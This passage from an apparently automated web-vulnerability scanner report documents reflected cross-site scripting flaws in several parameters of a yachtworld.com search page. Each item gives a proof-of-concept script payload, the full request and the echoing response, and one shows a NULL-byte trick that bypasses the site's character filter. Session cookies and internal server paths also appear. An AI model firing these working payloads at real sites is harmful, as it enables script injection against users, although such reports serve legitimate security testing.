Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:07:45 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarine/boat
...[SNIP]...
<a href="pl_search_results.jsp?slim=broker&hosturl=starlingmarine&units=Feet&&cit=true&url=starlingmarine&&hosturl=starlingmarine&&ywo=starlingmarine1a26f"><script>alert(1)</script>db381be0f58&&lineonly&">
...[SNIP]...

3.348. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/pl_search_results.jsp

Issue detail

The value of the hosturl request parameter is copied into an HTML comment. The payload a6f45--><script>alert(1)</script>accdc107629 was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /core/listing/cache/pl_search_results.jsp?ywo=starlingmarine&ps=50&type=&new=&luom=126&hosturl=starlingmarinea6f45--><script>alert(1)</script>accdc107629&page=broker&slim=broker&lineonly HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.starlingmarine.com/used-new-boats-wilmington-morehead-nc.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:20 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 63750

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<script>alert(1)</script>accdc107629/boats.header.html:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarinea6f45-->
...[SNIP]...

3.349. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/pl_search_results.jsp

Issue detail

The value of the hosturl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39994"><script>alert(1)</script>da20646a72c was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/cache/pl_search_results.jsp?ywo=starlingmarine&ps=50&type=&new=&luom=126&hosturl=starlingmarine39994"><script>alert(1)</script>da20646a72c&page=broker&slim=broker&lineonly HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.starlingmarine.com/used-new-boats-wilmington-morehead-nc.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:04 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 63772

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarine39994
...[SNIP]...
<a href="pl_search_results.jsp?slim=broker&hosturl=starlingmarine39994"><script>alert(1)</script>da20646a72c&units=Feet&&cit=true&url=starlingmarine39994">
...[SNIP]...

3.350. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/pl_search_results.jsp

Issue detail

The value of the hosturl request parameter is copied into the HTML document as plain text between tags. The payload a24c9<script>alert(1)</script>6113b30340a was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/cache/pl_search_results.jsp?ywo=starlingmarine&ps=50&type=&new=&luom=126&hosturl=starlingmarinea24c9<script>alert(1)</script>6113b30340a&page=broker&slim=broker&lineonly HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.starlingmarine.com/used-new-boats-wilmington-morehead-nc.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:09 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 63016

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

 Exception while reading the file:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarinea24c9<script>alert(1)</script>6113b30340a/boats.header.html exception is java.io.FileNotFoundException: /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarinea24c9<script>
...[SNIP]...

3.351. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [slim parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/pl_search_results.jsp

Issue detail

The value of the slim request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfca7"><script>alert(1)</script>90203473068 was submitted in the slim parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/cache/pl_search_results.jsp?ywo=starlingmarine&ps=50&type=&new=&luom=126&hosturl=starlingmarine&page=broker&slim=brokerdfca7"><script>alert(1)</script>90203473068&lineonly HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.starlingmarine.com/used-new-boats-wilmington-morehead-nc.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:38 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 78214

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarine/boat
...[SNIP]...
<a href="pl_search_results.jsp?slim=brokerdfca7"><script>alert(1)</script>90203473068&hosturl=starlingmarine&units=Feet&&cit=true&url=starlingmarine&&hosturl=starlingmarine&&ywo=starlingmarine&&lineonly&&type=%28Power%29">
...[SNIP]...

3.352. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [so parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/pl_search_results.jsp

Issue detail

The value of the so request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 953fd"><script>alert(1)</script>85be9569d56 was submitted in the so parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/cache/pl_search_results.jsp?slim=broker&hosturl=starlingmarine&units=Feet&ps=50&slim=broker&uom=126&ywo=starlingmarine&duom=126&wuom=126&luom=126&so=0953fd"><script>alert(1)</script>85be9569d56&ps=50&n=1:1:60508:116115:54&searchPage= HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:05:31 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarine/boat
...[SNIP]...
<a href="pl_search_results.jsp?slim=broker&hosturl=starlingmarine&units=Feet&&cit=true&url=starlingmarine&&hosturl=starlingmarine&&ywo=starlingmarine&&type=%28Power%29&so=0953fd"><script>alert(1)</script>85be9569d56">
...[SNIP]...

3.353. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [type parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/pl_search_results.jsp

Issue detail

The value of the type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1a26"><script>alert(1)</script>7b6664b8358 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/cache/pl_search_results.jsp?ywo=starlingmarine&ps=50&type=a1a26"><script>alert(1)</script>7b6664b8358&new=&luom=126&hosturl=starlingmarine&page=broker&slim=broker&lineonly HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.starlingmarine.com/used-new-boats-wilmington-morehead-nc.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:38:31 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 12311

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarine/boat
...[SNIP]...
<input type="hidden" name="type" value="a1a26"><script>alert(1)</script>7b6664b8358" />
...[SNIP]...

3.354. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/pl_search_results.jsp

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e6b5"><script>alert(1)</script>50e38d0918a was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/cache/pl_search_results.jsp?slim=broker&hosturl=starlingmarine&units=Feet&&cit=true&url=starlingmarine4e6b5"><script>alert(1)</script>50e38d0918a&&hosturl=starlingmarine&&ywo=starlingmarine&&lineonly&&type=%28Power%29 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:07:11 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarine/boat
...[SNIP]...
168130&checked=2236801&checked=2176549&checked=2047889&checked=2197077&checked=2265142&checked=2299198&checked=2156078&checked=2277879&checked=2243382&checked=2299200&checked=2299202&url=starlingmarine4e6b5"><script>alert(1)</script>50e38d0918a&hosturl=starlingmarine&">
...[SNIP]...

3.355. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/pl_search_results.jsp

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006291e"><script>alert(1)</script>0d77fcea0d6 was submitted in the url parameter. This input was echoed as 6291e"><script>alert(1)</script>0d77fcea0d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /core/listing/cache/pl_search_results.jsp?slim=broker&hosturl=starlingmarine&units=Feet&&cit=true&url=starlingmarine%006291e"><script>alert(1)</script>0d77fcea0d6&&hosturl=starlingmarine&&ywo=starlingmarine&&lineonly&&type=%28Power%29 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; 